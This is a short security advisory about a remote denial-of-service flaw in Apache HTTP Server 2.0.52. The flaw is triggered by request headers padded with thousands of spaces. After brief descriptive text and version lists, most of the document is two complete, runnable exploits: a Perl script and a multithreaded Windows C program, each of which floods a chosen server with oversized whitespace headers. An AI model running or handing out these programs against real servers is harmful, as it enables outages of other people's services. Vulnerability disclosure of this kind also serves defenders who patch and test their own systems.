|
|
|
|
| |
The Apache Software Foundation's HTTP Server Project is an effort to develop and maintain an open-source web server for modern operating systems including UNIX and Microsoft Windows".
A remote denial of service attack can be caused by an attacker by sending a malformed HTTP request that contains a header with multiple space at its begining. |
| |
Credit:
The information has been provided by Chintan Trivedi.
|
| |
Vulnerable Systems:
* Apache version 2.0.52
Immune Systems:
* Apache version 1.3.29
Example:
GET / HTTP/1.0\n
[space] x 8000\n
[space] x 8000\n
[space] x 8000\n
.
.
8000 times
Exploit (In Perl):
#!/usr/bin/perl
# Noam Rathaus of Beyond Security Ltd.
#
use strict;
use IO::Socket::INET;
usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";
$socket->autoflush(1);
print "Sending...\n";
print $socket "GET / HTTP/1.0\n";
for (my $count = 0; $count < 8000; $count++)
{
if ($count % 10 == 0)
{
print ".";
}
print $socket (" "x8000)."\n";
}
print $socket "\n";
print "Done.\n";
while (<$socket>)
{
print $_;
}
close($socket);
exit(0);
sub usage
{
print "\nApache 2.0.52 8000x\" \" DoS attack\n";
print "\nUsage: apache_xpl.pl [host] [port]\n";
print "\n";
exit(1);
}
Exploit (In C code):
/// Apache 2.0.52 and earlier DoS - Chintan Trivedi <chesschintan@gmail.com>
#include "stdafx.h"
#include "winsock.h"
#include "string.h"
#include "stdio.h"
#include "windows.h"
#pragma comment(lib,"ws2_32")
DWORD WINAPI attack(LPVOID);
char target[256];
int main(int argc, char* argv[])
{
int l=0;
int j;
DWORD dw;
HANDLE hd;
if(argc<2)
{
printf("usage: %s target", argv[0]);
exit(0);
}
strncpy(target, argv[1], 256);
printf("Attaching %s ...\n", target);
for(j=0;j<50;j++)
hd=CreateThread(NULL,0, attack, (LPVOID) l , 0, &dw);
for(j=0;j<50;j++)
WaitForSingleObject(hd, INFINITE);
printf ("done");
return 0;
}
DWORD WINAPI attack(LPVOID l)
{
int s;
SOCKADDR_IN sck;
HOSTENT *host;
char buff[256];
char space[8000];
int i;
WSADATA wsadata;
WSAStartup(MAKEWORD(1,1),&wsadata);
memset(space, ' ', 8000);
space[7998]='\n';
space[7999]='\0';
if((host=gethostbyname(target))==NULL)
{
printf("Host not found");
return -1;
}
sck.sin_family = PF_INET;
memcpy(&sck.sin_addr.s_addr, host->h_addr, host->h_length );
sck.sin_port = htons(80);
if((s=socket(AF_INET,SOCK_STREAM,0))==-1)
{
printf("Socket couldn't be initiallized");
return -1;
}
if((connect(s,(struct sockaddr *)&sck,sizeof(sck))))
{
printf("Couldn't connect");
return -1;
}
sprintf(buff, "GET / HTTP/1.0\n");
//printf("%s",buff);
int len=strlen(buff);
if((send(s,buff,len,0))==-1)
{
printf ("send error");
closesocket(s);
return -1;
}
for(i=0;i<9999;i++)
{
if((send(s,space,strlen(space),0))==-1)
{
printf("Send Error on header number %d", i);
closesocket(s);
return -1;
}
}
closesocket(s);
return 0;
}
|
|
|
|
|
